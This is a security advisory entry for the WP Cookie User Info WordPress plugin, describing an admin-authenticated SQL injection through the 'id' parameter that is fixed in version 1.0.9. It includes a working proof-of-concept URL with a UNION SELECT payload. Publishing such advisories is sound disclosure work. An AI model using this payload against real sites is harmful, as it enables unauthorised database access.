WordPress Plugin Vulnerabilities
WP Cookie User Info < 1.0.9 - Admin+ SQL Injection
Description
The plugin does not sanitise or escape the id GET parameter before using it in a SQL statement, when retrieving the setting to edit in the admin dashboard, leading to an authenticated SQL Injection
Proof of Concept
https://example.com/wp-admin/admin.php?page=wpcui-manage-settings&action=edit&id=-7418+UNION+ALL+SELECT+NULL%2Ccurrent_user()%2Ccurrent_user()%2CNULL%2CNULL%2CNULL
Affects Plugins
Fixed in version 1.0.9
References
Classification
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
Timeline
Publicly Published
2021-12-27 (about 6 months ago)
Added
2021-12-27 (about 6 months ago)
Last Updated
2022-04-16 (about 2 months ago)